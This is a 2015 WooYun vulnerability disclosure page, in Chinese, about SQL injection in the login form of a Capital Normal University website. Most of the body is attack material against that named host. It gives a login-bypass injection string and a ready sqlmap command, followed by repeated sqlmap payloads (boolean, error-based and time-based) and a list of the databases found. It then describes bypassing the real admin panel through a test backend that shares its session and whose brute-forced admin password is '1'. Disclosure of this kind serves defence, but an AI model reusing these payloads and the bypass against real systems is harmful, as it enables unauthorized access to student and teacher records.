当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115463

漏洞标题:首师大某站SQL注入

相关厂商:首都师范大学

漏洞作者: nyangawa

提交时间:2015-05-22 15:47

修复时间:2015-05-27 15:48

公开时间:2015-05-27 15:48

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-22: 细节已通知厂商并且等待厂商处理中
2015-05-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

SQL注入导致可进入管理后台查看师生信息/群发邮件短信/修改首页公告

详细说明:

http://chinese.cnu.edu.cn/index.php
sqlmap直接扫并不会出现什么问题。
手工测试发现用户名为 admin ' 时会报错。

Database error: Invalid SQL: select * from user where current=0 and (trim(num)='admin '' or name='admin '') and passwd='098f6bcd4621d373cade4e832627b4f6'


构造用户名 admin ') -- ' 成功登录。

lock-2.png


根据构造的用户名再上sqlmap

python2 sqlmap.py -u chinese.cnu.edu.cn --data="website=chinese&user_name=admin%27%29&user_pass=&Submit=%E7%99%BB%E9%99%86" -p user_name --suffix=" -- '" --dbs


sqlmap identified the following injection points with a total of 48 HTTP(s) requests:
---
Parameter: user_name (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: website=chinese&user_name=admin') AND 3098=3098-- '&user_pass=&Submit=%E7%99%BB%E9%99%86
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: website=chinese&user_name=admin') AND (SELECT 8490 FROM(SELECT COUNT(*),CONCAT(0x7178707071,(SELECT (ELT(8490=8490,1))),0x7176707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '&user_pass=&Submit=%E7%99%BB%E9%99%86
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.8
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 1440 HTTP(s) requests:
---
Parameter: user_name (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: website=chinese&user_name=admin') AND (SELECT 9634 FROM(SELECT COUNT(*),CONCAT(0x7170717671,(SELECT (ELT(9634=9634,1))),0x71767a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) -- '&user_pass=&Submit=%E7%99%BB%E9%99%86
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: website=chinese&user_name=admin') AND (SELECT * FROM (SELECT(SLEEP(5)))mKcO) -- '&user_pass=&Submit=%E7%99%BB%E9%99%86
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.8
back-end DBMS: MySQL 5.0
available databases [11]:
[*] app
[*] chenjiao
[*] chinese
[*] gdwx
[*] information_schema
[*] mrbs
[*] mysql
[*] online
[*] phpmyadmin
[*] student
[*] teacher


经测试发现http://chinese.cnu.edu.cn/admin (真的管理后台) 和 http://chinese.cnu.edu.cn/student (测试用的管理后台) 的代码一致且共用同一个session,只是管理员密码不同,而爆破发现测试后台的 admin 密码为 1。
于是这样绕过真正的管理后台认证:
1. 用admin:1登录http://chinese.cnu.edu.cn/student
2. 直接访问http://chinese.cnu.edu.cn/admin即可以admin身份进入真后台
后台能干什么都在下面这张图里了。

lock-3.png


Server里还有一些别的服务,没什么内容就没有更深的测试。

漏洞证明:

sqlmap identified the following injection points with a total of 48 HTTP(s) requests:
---
Parameter: user_name (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: website=chinese&user_name=admin') AND 3098=3098-- '&user_pass=&Submit=%E7%99%BB%E9%99%86
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: website=chinese&user_name=admin') AND (SELECT 8490 FROM(SELECT COUNT(*),CONCAT(0x7178707071,(SELECT (ELT(8490=8490,1))),0x7176707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '&user_pass=&Submit=%E7%99%BB%E9%99%86
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.8
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 1440 HTTP(s) requests:
---
Parameter: user_name (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: website=chinese&user_name=admin') AND (SELECT 9634 FROM(SELECT COUNT(*),CONCAT(0x7170717671,(SELECT (ELT(9634=9634,1))),0x71767a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) -- '&user_pass=&Submit=%E7%99%BB%E9%99%86
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: website=chinese&user_name=admin') AND (SELECT * FROM (SELECT(SLEEP(5)))mKcO) -- '&user_pass=&Submit=%E7%99%BB%E9%99%86
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.8
back-end DBMS: MySQL 5.0
available databases [11]:
[*] app
[*] chenjiao
[*] chinese
[*] gdwx
[*] information_schema
[*] mrbs
[*] mysql
[*] online
[*] phpmyadmin
[*] student
[*] teacher


lock-3.png


修复方案:

这种事还是让专业的来吧

版权声明:转载请注明来源 nyangawa@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-27 15:48

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2015-05-30 12:22 | Eric_zZ ( 路人 | Rank:8 漏洞数:5 | Just try it!)

    楼主,可以讲下你构造那个网址的思路吗?可以用sqlmap跑数据的那个